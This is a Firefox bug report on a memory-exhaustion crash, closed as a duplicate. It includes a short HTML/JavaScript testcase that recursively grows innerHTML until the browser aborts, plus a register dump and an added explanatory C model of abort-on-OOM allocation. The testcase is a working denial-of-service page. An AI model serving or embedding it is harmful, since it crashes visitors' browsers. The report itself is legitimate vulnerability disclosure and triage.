Memory Exhaustion DoS Exploit

Status: RESOLVED DUPLICATE of bug 618234
Severity: major
Reported: 6 years ago
Modified: 5 years ago

People

(Reporter: shashankcyberboy, Unassigned)

Tracking

Version: Trunk
Hardware: x86, Windows 7
Keywords: crash, reproducible, sec-low, testcase
Firefox Tracking Flags: Not tracked

Attachments

(2 attachments)

(Reporter)

Description

6 years ago
<!--

---------------------------------------------------
Mozilla Firefox 14.01 Memory Exhaustion DoS Exploit
---------------------------------------------------



Description:

Mozilla Firefox is prone to a memory exhaustion vulnerability.
The issue has been tested on Firefox 14.01, prior versions may also be affected.

mozalloc.cpp, line 184:

moz_xposix_memalign(void **ptr, size_t alignment, size_t size)
{
    int err = posix_memalign(ptr, alignment, size);
    if (UNLIKELY(err && ENOMEM == err)) {

        mozalloc_handle_oom();
        return moz_xposix_memalign(ptr, alignment, size);
    }
    // else: (0 == err) or (EINVAL == err)
    return err;
}

A crafted JavaScript leads the application to crash.

Stacktrace (Windows 7 SP1):

EAX 00000000
ECX 5D923896 MSVCR100.5D923896
EDX 00000003
EBX 7FB00000 UNICODE "xxxxxxxxx [...]"
ESP 002BB7F8
EBP 002BB85C
ESI 5D8D1EC6 MSVCR100.__p__iob
EDI 5D92379C MSVCR100.fputs
EIP 73FC1999 mozalloc.73FC1999
C 0  ES 0023 32bit 0(FFFFFFFF)
P 0  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 0  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDF000(C000)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_NOT_ENOUGH_MEMORY (00000008)
EFL 00000202 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty 1.0000000000000000000
ST1 empty 0.1085754583206562651
ST2 empty -0.0696429635909516231
ST3 empty 86.763962149620056150
ST4 empty 31200.200000000000730
ST5 empty 1.3451474216221712500e+15
ST6 empty 1.0390856000000000000e+10
ST7 empty 0.0
               3 2 1 0      E S P U O Z D I
FST 0022  Cond 0 0 0 0  Err 0 0 1 0 0 0 1 0  (GT)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1

-->

<html>
<head>
<title></title>
</head>
<body></body>
<script>
function e(x)
{
  document.body.innerHTML += x;
  e(x + 'x');
};

e('x')
</script>
</html>
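The security-relevant point in the report is that mozalloc's moz_x* wrappers are infallible: on ENOMEM they call mozalloc_handle_oom(), which aborts, so unbounded growth like the testcase above ends in a deterministic crash rather than a NULL dereference or a silently truncated write. The C program below is an added example, not Firefox code and not the reporter's testcase; the allocator names (x_malloc, set_oom_handler, x_malloc_or_recover) and the growth model (simulate_innerhtml_growth) are hypothetical. It shows the abort-on-OOM wrapper with its retry, a longjmp hook that lets the OOM path be exercised without killing the process, and a model of how `innerHTML += x` with a growing `x` leaves the document holding i*(i+1)/2 bytes after i rounds.

```c
/* Added example, not Firefox code: an infallible allocator in the style of
 * mozalloc's moz_x* wrappers, plus a model of the testcase's growth pattern.
 * All names here (x_malloc, set_oom_handler, ...) are hypothetical. */
#include <setjmp.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

typedef void (*oom_handler_fn)(size_t size);

/* Default handler: deterministic abort, like mozalloc_handle_oom(). Converting
 * an unchecked NULL into a crash is why the bug is rated DoS / sec-low. */
static void default_oom_handler(size_t size) {
    fprintf(stderr, "out of memory: requested %zu bytes\n", size);
    abort();
}

static oom_handler_fn g_oom_handler = default_oom_handler;

/* Install a handler; returns the previous one. NULL restores the default. */
oom_handler_fn set_oom_handler(oom_handler_fn h) {
    oom_handler_fn old = g_oom_handler;
    g_oom_handler = h ? h : default_oom_handler;
    return old;
}

/* Infallible allocation: never returns NULL. On failure call the handler and
 * retry, as moz_xposix_memalign() does. With the default handler the retry is
 * never reached, because abort() does not return. */
void *x_malloc(size_t size) {
    void *p = malloc(size);
    while (p == NULL) {
        g_oom_handler(size);
        p = malloc(size);
    }
    return p;
}

/* Demonstration-only recovery: longjmp out of the OOM handler so the OOM path
 * can be exercised without killing the process. */
static jmp_buf g_oom_jmp;

static void longjmp_oom_handler(size_t size) {
    (void)size;
    longjmp(g_oom_jmp, 1);
}

/* Like x_malloc, but returns NULL and sets *oomed if the handler fired. */
void *x_malloc_or_recover(size_t size, int *oomed) {
    void *volatile p = NULL;
    *oomed = 0;
    oom_handler_fn prev = set_oom_handler(longjmp_oom_handler);
    if (setjmp(g_oom_jmp) == 0) {
        p = x_malloc(size);
    } else {
        *oomed = 1;
    }
    set_oom_handler(prev);
    return p;
}

/* Model of the testcase: round i appends i bytes of 'x', so after i rounds the
 * body holds i*(i+1)/2 bytes (and innerHTML += also re-serialises and re-parses
 * the whole body every round). Uses fallible realloc and a byte budget, so it
 * stops cleanly instead of aborting. Returns rounds completed; *total receives
 * the bytes held at that point. */
size_t simulate_innerhtml_growth(size_t budget, size_t *total) {
    char *body = NULL;
    size_t len = 0, rounds = 0;
    for (size_t chunk = 1; len + chunk <= budget; chunk++) {
        char *grown = realloc(body, len + chunk + 1);
        if (grown == NULL) {
            break;                      /* fallible path: give up cleanly */
        }
        body = grown;
        memset(body + len, 'x', chunk);
        len += chunk;
        body[len] = '\0';
        rounds++;
    }
    free(body);
    *total = len;
    return rounds;
}

int main(void) {
    size_t total = 0;
    size_t rounds = simulate_innerhtml_growth(1000000, &total);
    printf("budget 1000000 bytes: %zu rounds, %zu bytes held\n", rounds, total);

    int oomed = 0;
    void *p = x_malloc_or_recover(SIZE_MAX, &oomed);
    printf("x_malloc(SIZE_MAX): %s\n", oomed ? "OOM handler fired" : "succeeded");
    free(p);

    /* With the default handler installed, this would abort instead of return:
     * x_malloc(SIZE_MAX); */
    return 0;
}
```

With the default handler installed, `x_malloc(SIZE_MAX)` prints the message and aborts, which is the outcome the report's register dump records (LastErr ERROR_NOT_ENOUGH_MEMORY with EIP inside mozalloc). The fallible realloc path in `simulate_innerhtml_growth` is the alternative a component takes when it wants to degrade gracefully instead of crashing; for a web-exposed allocation with attacker-controlled size, the abort is the safer default because it cannot be turned into memory corruption.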

Comment 1

6 years ago
DoS bugs from an intentional abort on OOM do not need to remain hidden.
Group: core-security
Keywords: sec-low
(Reporter)

Comment 2

6 years ago
(In reply to Benjamin Smedberg  [:bsmedberg] from comment #1)
> DoS bugs from an intentional abort on OOM do not need to remain hidden.

ok
Component: General → General
Keywords: crash, reproducible, testcase
Product: Firefox → Core
Version: unspecified → Trunk
Created attachment 654173 [details]
Reporter's Testcase
Created attachment 654174 [details]
WinDbg Stack

Log against Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0 ID:20120821135628 (x64 Build) with javascript.options.mem.log;true.
Status: UNCONFIRMED → NEW
Component: General → HTML: Parser
Ever confirmed: true
Comment 5

This is a duplicate.  Please find the original and mark this a duplicate?
Whiteboard: DUPEME

Comment 6

I'm not sure, but maybe Bug 659333 whose Testcase uses innerHTML too?
(Reporter)

Comment 7

6 years ago
(In reply to Boris Zbarsky (:bz) [In and out Aug 1 - 10, out Aug 11-20] from comment #5)
> This is a duplicate.  Please find the original and mark this a duplicate?

sorry but it's not a duplicate :/
Status: NEW → RESOLVED
Last Resolved: 6 years ago
Resolution: --- → DUPLICATE
Duplicate of bug: 618234

Updated

5 years ago
Whiteboard: DUPEME